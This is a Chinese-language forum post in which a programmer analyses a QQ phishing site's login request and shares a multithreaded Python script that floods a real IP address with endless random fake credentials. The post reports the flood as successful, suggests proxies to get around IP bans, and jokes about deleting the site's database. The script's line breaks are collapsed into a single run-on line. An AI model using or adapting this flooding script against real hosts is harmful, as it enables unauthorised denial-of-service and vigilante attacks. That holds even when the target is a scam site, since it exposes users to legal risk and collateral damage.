当一个程序员遇到盗号网站
事情发生的原由最近收到了一封邮件,邮件长这样,告诉我要期末考试了。
邮件
话说谁不知道要期末考试了,还需要你来告诉我???
一看这个,我就知道绝逼是一个盗号网站,因为以前还遇到过联盟抽奖的邮件。进入之后,网站长这样,emm,这个也太假了吧(看网站的域名即可,不是qq.com结尾的都是耍流氓)。
网站
在这里随便输入一个账号密码,然后告诉你密码错误。
最后自动跳转到qq邮箱的登陆页面(牛逼啊,作者真聪明)。
分析网站请求
在chrome浏览器中,按住F12,然后随便输入账号密码点击登录,就可以看到究竟往后台发送了什么内容。
网站请求
这里可以使用chrome中的一个插件,或者postman,来模拟一下请求。
模拟请求
[*]工具:Crap API(chrome插件)
接下来是模拟请求,然后如下图所示:
模拟请求
那么,我们可以对这个网站进行什么骚操作呢?
骚操作有很多,不过这里我选择了最简单的方式,作死的给这个连接发送请求。
选择的编程语言是python,因为简单,写的快。
python代码
下面是用python代码写的一个请求
import requestsimport threadingimport randomimport string# 盗号网站的请求的网址url = "http://154.92.16.197/x$xc/6.asp?sn_sid="def myIpPost(): while(True): # 产生随机的账号和密码 salt = ''.join(random.sample(string.ascii_letters + string.digits, random.randint(10,15))) num = ''.join(str(i) for i in random.sample(range(0,9),random.randint(6,9))) data = { "qq":num, "mima":salt, "MM_insert":"form1" } try: # 发送post请求 r = requests.post(url,data=data,allow_redirects=False) print(r) except: print("I post fail") passif __name__ == "__main__": # 开启多线程同时请求 for i in range(0,1000): threading.Thread(target=myIpPost).start()代码还是很简单的,接下来就是运行代码了。
response 200 则代表请求成功。嘻嘻嘻
response
结语
这种方式是最简单的方式,如果出现ip被ban的话,可以用代理去解决这些问题。实际上还可以尝试着删库跑路,一气呵成,不过最近要考试,没时间去看,就这样吧。
望评论区的大佬们手下留情,毕竟我是个菜鸡。
页:
[1]